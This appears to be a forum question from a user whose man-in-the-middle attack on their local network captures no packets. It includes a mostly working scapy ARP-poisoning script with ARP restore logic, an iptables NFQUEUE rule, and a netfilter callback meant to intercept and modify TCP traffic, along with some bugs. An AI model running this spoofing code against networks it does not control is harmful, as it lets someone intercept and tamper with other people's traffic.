i try to poison my local network (MITM) to get value send over the TCP , change it and send it. ( Use scapy and Netfilter with iptables ) i don't is it possible change packet on the fly or i have to create copy of that then drop it and send new packet with changed specific value. for now i wrote this code but i don't see any packet.
/proc/net/netfilter/nfnetlink_queue
0 48352 0 2 65531 0 0 0 1
iptables rule :
iptables -I INPUT -s 192.168.0.2 -p tcp --dport 6767 -j NFQUEUE
192.168.3.2 is victim and 192.168.0.1 is gateway and forwarding :
/proc/sys/net/ipv4/ip_forward
1
here is my code :
from scapy.all import *
from scapy.error import Scapy_Exception
import os
import sys
import threading
import signal
from netfilterqueue import NetfilterQueue
import nfqueue
INTERFACE = 'eth0'
TARGET_IP = '192.168.0.1'
GATEWAY_IP = '192.168.0.2'
PACKET_COUNT = 100
def test (packet):
print packet.show()
packet.accept()
def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):
print '[*] Restoring targets...'
send(ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst='ff:ff:ff:ff:ff:ff', \
hwsrc=gateway_mac), count=5)
send(ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst="ff:ff:ff:ff:ff:ff", \
hwsrc=target_mac), count=5)
os.kill(os.getpid(), signal.SIGINT)
def get_mac(ip_address):
response, unanswered = srp(Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip_address), \
timeout=2, retry=10)
for s, r in response:
return r[Ether].src
return None
def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
poison_target = ARP()
poison_target.op = 2
poison_target.psrc = gateway_ip
poison_target.pdst = target_ip
poison_target.hwdst = target_mac
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = target_ip
poison_gateway.pdst = gateway_ip
poison_gateway.hwdst = gateway_mac
print '[*] Beginning the ARP poison. [CTRL-C to stop]'
while 1:
try:
send(poison_target)
send(poison_gateway)
time.sleep(2)
except KeyboardInterrupt:
restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
print '[*] ARP poison attack finished.'
return
if __name__ == '__main__':
conf.iface = INTERFACE
conf.verb = 0
print "[*] Setting up %s" % INTERFACE
GATEWAY_MAC = get_mac(GATEWAY_IP)
if GATEWAY_MAC is None:
print "[-] Failed to get gateway MAC. Exiting."
sys.exit(0)
else:
print "[*] Gateway %s is at %s" %(GATEWAY_IP, GATEWAY_MAC)
TARGET_MAC = get_mac(TARGET_IP)
if TARGET_MAC is None:
print "[-] Failed to get target MAC. Exiting."
sys.exit(0)
else:
print "[*] Target %s is at %s" % (TARGET_IP, TARGET_MAC)
poison_thread = threading.Thread(target = poison_target, args=(GATEWAY_IP, GATEWAY_MAC, \
TARGET_IP, TARGET_MAC))
poison_thread.start()
# Create Queue
q = nfqueue.queue()
q.open()
q.bind(socket.AF_INET)
q.set_callback(test)
q.create_queue(0)
try:
print '[*] Starting sniffer for %d packets' %PACKET_COUNT
bpf_filter = 'IP host ' + TARGET_IP
q.try_run()
restore_target(GATEWAY_IP, GATEWAY_MAC, TARGET_IP, TARGET_MAC)
except Scapy_Exception as msg:
print msg, "Hi there!!"
except KeyboardInterrupt:
q.unbind(socket.AF_INET)
q.close()
restore_target(GATEWAY_IP, GATEWAY_MAC, TARGET_IP, TARGET_MAC)
sys.exist()
i'm sure ARP-poisoning is work very well but i don't know why it's print nothing
referring these links :
ARP-poisoning
and
Change TCP Payload
and
